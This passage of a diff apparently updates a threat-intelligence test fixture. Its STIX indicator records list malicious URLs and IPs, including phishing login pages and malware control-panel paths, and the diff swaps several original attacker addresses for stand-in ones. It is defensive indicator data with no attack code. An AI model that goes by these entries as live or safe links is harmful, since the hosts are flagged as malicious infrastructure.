'http://wusetwo.xyz/public_html/file/five/inc/class/pCharts/info/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:11.038Z\"}", "category": "threat", "type": "indicator", @@ -4560,7 +4560,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://185.234.217.36/northon/", + "name": "mal_url: http://89.160.20.156/northon/", "description": "TS ID: 55253484366; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime", "modified": "2020-01-25T02:58:20.420Z", "valid_from": "2020-01-25T02:58:20.42Z", @@ -4584,16 +4584,16 @@ "provider": "CyberCrime", "url": { "path": "/northon/", - "original": "http://185.234.217.36/northon/", + "original": "http://89.160.20.156/northon/", "scheme": "http", - "domain": "185.234.217.36", - "full": "http://185.234.217.36/northon/" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/northon/" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385473443Z", - "original": "{\"created\":\"2020-01-25T02:58:20.42Z\",\"description\":\"TS ID: 55253484366; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime\",\"id\":\"indicator--f1bdef49-666f-46b5-a323-efa1f1446b62\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-64\"],\"modified\":\"2020-01-25T02:58:20.42Z\",\"name\":\"mal_url: http://185.234.217.36/northon/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://185.234.217.36/northon/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:20.42Z\"}", + "ingested": "2021-12-13T08:38:40.023095100Z", + "original": "{\"created\":\"2020-01-25T02:58:20.42Z\",\"description\":\"TS ID: 55253484366; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime\",\"id\":\"indicator--f1bdef49-666f-46b5-a323-efa1f1446b62\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-64\"],\"modified\":\"2020-01-25T02:58:20.42Z\",\"name\":\"mal_url: http://89.160.20.156/northon/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/northon/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:20.42Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4644,7 +4644,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385477661Z", + "ingested": "2021-12-13T08:38:40.023100500Z", "original": "{\"created\":\"2020-01-25T02:58:20.448Z\",\"description\":\"TS ID: 55253484354; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--a173f4b1-67ce-44f8-a6d0-bd8a24e8c593\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-25T02:58:20.448Z\",\"name\":\"mal_url: http://topik07.mcdir.ru/papka/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://topik07.mcdir.ru/papka/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:20.448Z\"}", "category": "threat", "type": "indicator", @@ -4696,7 +4696,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385481979Z", + "ingested": "2021-12-13T08:38:40.023105800Z", "original": "{\"created\":\"2020-01-25T02:58:33.189Z\",\"description\":\"TS ID: 55253484362; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--b53dded1-d293-4cd1-9e63-b6e0cbd850f0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-25T02:58:33.189Z\",\"name\":\"mal_url: http://insuncos.com/files2/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://insuncos.com/files2/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:33.189Z\"}", "category": "threat", "type": "indicator", @@ -4715,7 +4715,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://185.234.218.68/kaspersky/", + "name": "mal_url: http://89.160.20.156/kaspersky/", "description": "TS ID: 55253484364; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime", "modified": "2020-01-25T02:58:49.056Z", "valid_from": "2020-01-25T02:58:49.056Z", @@ -4739,16 +4739,16 @@ "provider": "CyberCrime", "url": { "path": "/kaspersky/", - "original": "http://185.234.218.68/kaspersky/", + "original": "http://89.160.20.156/kaspersky/", "scheme": "http", - "domain": "185.234.218.68", - "full": "http://185.234.218.68/kaspersky/" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/kaspersky/" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385486187Z", - "original": "{\"created\":\"2020-01-25T02:58:49.056Z\",\"description\":\"TS ID: 55253484364; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime\",\"id\":\"indicator--2b30f8fe-13e8-4a7d-8eba-3e59c288bef7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-01-25T02:58:49.056Z\",\"name\":\"mal_url: http://185.234.218.68/kaspersky/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://185.234.218.68/kaspersky/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:49.056Z\"}", + "ingested": "2021-12-13T08:38:40.023110400Z", + "original": "{\"created\":\"2020-01-25T02:58:49.056Z\",\"description\":\"TS ID: 55253484364; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime\",\"id\":\"indicator--2b30f8fe-13e8-4a7d-8eba-3e59c288bef7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-01-25T02:58:49.056Z\",\"name\":\"mal_url: http://89.160.20.156/kaspersky/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/kaspersky/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:49.056Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4799,7 +4799,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385490555Z", + "ingested": "2021-12-13T08:38:40.023116100Z", "original": "{\"created\":\"2020-01-25T02:58:59.472Z\",\"description\":\"TS ID: 55253484357; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--f502199a-17a4-404b-a114-fb5eda28c32c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T02:58:59.472Z\",\"name\":\"mal_url: http://officelog.org/inc/js/jstree/mh/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://officelog.org/inc/js/jstree/mh/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:59.472Z\"}", "category": "threat", "type": "indicator", @@ -4851,7 +4851,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385494673Z", + "ingested": "2021-12-13T08:38:40.023123700Z", "original": "{\"created\":\"2020-01-25T02:59:27.07Z\",\"description\":\"TS ID: 55253484359; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--af7422eb-5d8e-4878-bdd1-395313434dae\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T02:59:27.07Z\",\"name\":\"mal_url: http://officelog.org/inc/js/jstree/ch/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://officelog.org/inc/js/jstree/ch/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:27.07Z\"}", "category": "threat", "type": "indicator", @@ -4903,7 +4903,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385499442Z", + "ingested": "2021-12-13T08:38:40.023131300Z", "original": "{\"created\":\"2020-01-25T02:59:28.967Z\",\"description\":\"TS ID: 55253484358; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--71b36c05-86dd-4685-81c0-5a99e2e14c23\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T02:59:28.967Z\",\"name\":\"mal_url: http://officelog.org/inc/js/jstree/dar/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://officelog.org/inc/js/jstree/dar/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:28.967Z\"}", "category": "threat", "type": "indicator", @@ -4955,7 +4955,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385503589Z", + "ingested": "2021-12-13T08:38:40.023136900Z", "original": "{\"created\":\"2020-01-25T02:59:37.661Z\",\"description\":\"TS ID: 55253484352; iType: mal_url; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--9d948509-dfb4-45b6-b8bc-780df88a213f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-25T02:59:37.661Z\",\"name\":\"mal_url: http://oaa-my.com/cage/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://oaa-my.com/cage/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:37.661Z\"}", "category": "threat", "type": "indicator", @@ -4974,7 +4974,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 192.64.118.56", + "name": "mal_ip: 192.168.118.56", "description": "TS ID: 55253484224; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime", "modified": "2020-01-25T02:59:37.692Z", "valid_from": "2020-01-25T02:59:37.692Z", @@ -4996,12 +4996,12 @@ "first_seen": "2020-01-25T02:59:37.692Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "192.64.118.56" + "ip": "192.168.118.56" } }, "event": { - "ingested": "2021-12-13T05:57:34.385508268Z", - "original": "{\"created\":\"2020-01-25T02:59:37.692Z\",\"description\":\"TS ID: 55253484224; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--9f613f8e-2040-4eee-8044-044023a8093e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-01-25T02:59:37.692Z\",\"name\":\"mal_ip: 192.64.118.56\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '192.64.118.56']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:37.692Z\"}", + "ingested": "2021-12-13T08:38:40.023140500Z", + "original": "{\"created\":\"2020-01-25T02:59:37.692Z\",\"description\":\"TS ID: 55253484224; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--9f613f8e-2040-4eee-8044-044023a8093e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-01-25T02:59:37.692Z\",\"name\":\"mal_ip: 192.168.118.56\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '192.168.118.56']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:37.692Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5052,7 +5052,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385513198Z", + "ingested": "2021-12-13T08:38:40.023144500Z", "original": "{\"created\":\"2020-01-25T02:59:54.296Z\",\"description\":\"TS ID: 55253484361; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--518c3959-6c26-413f-9a5f-c8f76d86185a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-25T02:59:54.296Z\",\"name\":\"mal_url: http://insuncos.com/files3/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://insuncos.com/files3/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:54.296Z\"}", "category": "threat", "type": "indicator", @@ -5103,7 +5103,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385517516Z", + "ingested": "2021-12-13T08:38:40.023149600Z", "original": "{\"created\":\"2020-01-25T02:59:57.748Z\",\"description\":\"TS ID: 55253484347; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--625b94ec-2304-4502-a2eb-59d52cdb9c1f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-01-25T02:59:57.748Z\",\"name\":\"mal_url: http://t95212tt.beget.tech/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://t95212tt.beget.tech/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:57.748Z\"}", "category": "threat", "type": "indicator", @@ -5154,7 +5154,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385522124Z", + "ingested": "2021-12-13T08:38:40.023155200Z", "original": "{\"created\":\"2020-01-25T03:00:22.168Z\",\"description\":\"TS ID: 55253484349; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--c8f76b97-051f-4fab-b57f-a57f37480aa0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-25T03:00:22.168Z\",\"name\":\"mal_url: http://kiototan.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://kiototan.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T03:00:22.168Z\"}", "category": "threat", "type": "indicator", @@ -5173,7 +5173,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 176.107.160.43", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55253484353; iType: mal_ip; State: active; Org: Com Telecom; Source: CyberCrime", "modified": "2020-01-25T03:00:27.279Z", "valid_from": "2020-01-25T03:00:27.279Z", @@ -5195,12 +5195,12 @@ "first_seen": "2020-01-25T03:00:27.279Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "176.107.160.43" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385526613Z", - "original": "{\"created\":\"2020-01-25T03:00:27.279Z\",\"description\":\"TS ID: 55253484353; iType: mal_ip; State: active; Org: Com Telecom; Source: CyberCrime\",\"id\":\"indicator--7abc3f41-e952-481f-8bf7-7b52af05451f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-01-25T03:00:27.279Z\",\"name\":\"mal_ip: 176.107.160.43\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '176.107.160.43']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T03:00:27.279Z\"}", + "ingested": "2021-12-13T08:38:40.023159400Z", + "original": "{\"created\":\"2020-01-25T03:00:27.279Z\",\"description\":\"TS ID: 55253484353; iType: mal_ip; State: active; Org: Com Telecom; Source: CyberCrime\",\"id\":\"indicator--7abc3f41-e952-481f-8bf7-7b52af05451f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-01-25T03:00:27.279Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T03:00:27.279Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5250,7 +5250,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385531111Z", + "ingested": "2021-12-13T08:38:40.023165800Z", "original": "{\"created\":\"2020-01-25T03:00:29.248Z\",\"description\":\"TS ID: 55253484340; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--72334129-8d1c-4cac-bde6-2d5d6316e266\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-25T03:00:29.248Z\",\"name\":\"mal_url: http://newfoundfriend.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://newfoundfriend.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T03:00:29.248Z\"}", "category": "threat", "type": "indicator", @@ -5302,7 +5302,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385535840Z", + "ingested": "2021-12-13T08:38:40.023170Z", "original": "{\"created\":\"2020-01-25T03:01:03.628Z\",\"description\":\"TS ID: 55253484360; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--a3f8f1e3-77c5-442d-a918-5d3d800a8357\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T03:01:03.628Z\",\"name\":\"mal_url: http://officelog.org/inc/js/jstree/bi/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://officelog.org/inc/js/jstree/bi/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T03:01:03.628Z\"}", "category": "threat", "type": "indicator", @@ -5354,7 +5354,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385540629Z", + "ingested": "2021-12-13T08:38:40.023174400Z", "original": "{\"created\":\"2020-01-25T03:01:03.65Z\",\"description\":\"TS ID: 55253484355; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--49bac194-cefe-4c31-81eb-cc81a3a3bb26\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T03:01:03.65Z\",\"name\":\"mal_url: http://officelog.org/inc/js/jstree/vic/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://officelog.org/inc/js/jstree/vic/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T03:01:03.65Z\"}", "category": "threat", "type": "indicator", @@ -5373,7 +5373,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://45.139.236.48/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55256890160; iType: mal_url; State: active; Source: CyberCrime", "modified": "2020-01-26T02:54:41.651Z", "valid_from": "2020-01-26T02:54:41.651Z", @@ -5397,16 +5397,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://45.139.236.48/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "45.139.236.48", - "full": "http://45.139.236.48/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385545198Z", - "original": "{\"created\":\"2020-01-26T02:54:41.651Z\",\"description\":\"TS ID: 55256890160; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--ec5f9f49-249b-4fc4-bb91-849c892c7453\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:54:41.651Z\",\"name\":\"mal_url: http://45.139.236.48/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://45.139.236.48/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:54:41.651Z\"}", + "ingested": "2021-12-13T08:38:40.023178Z", + "original": "{\"created\":\"2020-01-26T02:54:41.651Z\",\"description\":\"TS ID: 55256890160; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--ec5f9f49-249b-4fc4-bb91-849c892c7453\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:54:41.651Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:54:41.651Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5456,7 +5456,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385549616Z", + "ingested": "2021-12-13T08:38:40.023183300Z", "original": "{\"created\":\"2020-01-26T02:54:41.675Z\",\"description\":\"TS ID: 55256890149; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--3e082be1-f6be-45f6-811b-5e63e2a596c5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-26T02:54:41.675Z\",\"name\":\"mal_url: http://privatepp.club/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://privatepp.club/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:54:41.675Z\"}", "category": "threat", "type": "indicator", @@ -5507,7 +5507,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385556288Z", + "ingested": "2021-12-13T08:38:40.023208700Z", "original": "{\"created\":\"2020-01-26T02:54:41.705Z\",\"description\":\"TS ID: 55256890147; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--95774d83-e0e1-45e4-ab1c-1bb27588fa92\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-26T02:54:41.705Z\",\"name\":\"mal_url: http://109.94.208.144/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://109.94.208.144/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:54:41.705Z\"}", "category": "threat", "type": "indicator", @@ -5526,7 +5526,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://45.14.50.207/panel/admin.php", + "name": "mal_url: http://89.160.20.156/panel/admin.php", "description": "TS ID: 55256890123; iType: mal_url; State: active; Source: CyberCrime", "modified": "2020-01-26T02:55:15.583Z", "valid_from": "2020-01-26T02:55:15.583Z", @@ -5551,16 +5551,16 @@ "url": { "path": "/panel/admin.php", "extension": "php", - "original": "http://45.14.50.207/panel/admin.php", + "original": "http://89.160.20.156/panel/admin.php", "scheme": "http", - "domain": "45.14.50.207", - "full": "http://45.14.50.207/panel/admin.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/panel/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385560797Z", - "original": "{\"created\":\"2020-01-26T02:55:15.583Z\",\"description\":\"TS ID: 55256890123; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--0149e0f7-629c-41c5-a1e7-144b3c22d362\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-32\"],\"modified\":\"2020-01-26T02:55:15.583Z\",\"name\":\"mal_url: http://45.14.50.207/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://45.14.50.207/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:15.583Z\"}", + "ingested": "2021-12-13T08:38:40.023213Z", + "original": "{\"created\":\"2020-01-26T02:55:15.583Z\",\"description\":\"TS ID: 55256890123; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--0149e0f7-629c-41c5-a1e7-144b3c22d362\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-32\"],\"modified\":\"2020-01-26T02:55:15.583Z\",\"name\":\"mal_url: http://89.160.20.156/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:15.583Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5611,7 +5611,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385565516Z", + "ingested": "2021-12-13T08:38:40.023216400Z", "original": "{\"created\":\"2020-01-26T02:55:15.785Z\",\"description\":\"TS ID: 55256890140; iType: mal_url; State: active; Org: Global Data Networks LLC; Source: CyberCrime\",\"id\":\"indicator--751f6e49-92d5-4ff4-9245-870a49dce478\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:55:15.785Z\",\"name\":\"mal_url: http://molmarsl.com/leks/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://molmarsl.com/leks/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:15.785Z\"}", "category": "threat", "type": "indicator", @@ -5662,7 +5662,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385570445Z", + "ingested": "2021-12-13T08:38:40.023220500Z", "original": "{\"created\":\"2020-01-26T02:55:22.112Z\",\"description\":\"TS ID: 55256890166; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--e0bdcebe-2f97-4f8f-ad51-0b0c06b5071c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:55:22.112Z\",\"name\":\"mal_url: http://pecunia110011.at/iteat/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pecunia110011.at/iteat/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:22.112Z\"}", "category": "threat", "type": "indicator", @@ -5681,7 +5681,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://188.127.230.249/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55256890144; iType: mal_url; State: active; Org: Telecommunication Systems, LLC; Source: CyberCrime", "modified": "2020-01-26T02:55:31.348Z", "valid_from": "2020-01-26T02:55:31.348Z", @@ -5705,16 +5705,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://188.127.230.249/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "188.127.230.249", - "full": "http://188.127.230.249/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385574943Z", - "original": "{\"created\":\"2020-01-26T02:55:31.348Z\",\"description\":\"TS ID: 55256890144; iType: mal_url; State: active; Org: Telecommunication Systems, LLC; Source: CyberCrime\",\"id\":\"indicator--82f02b81-cfae-4bee-b85d-daf900c93936\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-01-26T02:55:31.348Z\",\"name\":\"mal_url: http://188.127.230.249/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://188.127.230.249/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:31.348Z\"}", + "ingested": "2021-12-13T08:38:40.023224100Z", + "original": "{\"created\":\"2020-01-26T02:55:31.348Z\",\"description\":\"TS ID: 55256890144; iType: mal_url; State: active; Org: Telecommunication Systems, LLC; Source: CyberCrime\",\"id\":\"indicator--82f02b81-cfae-4bee-b85d-daf900c93936\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-01-26T02:55:31.348Z\",\"name\":\"mal_url: 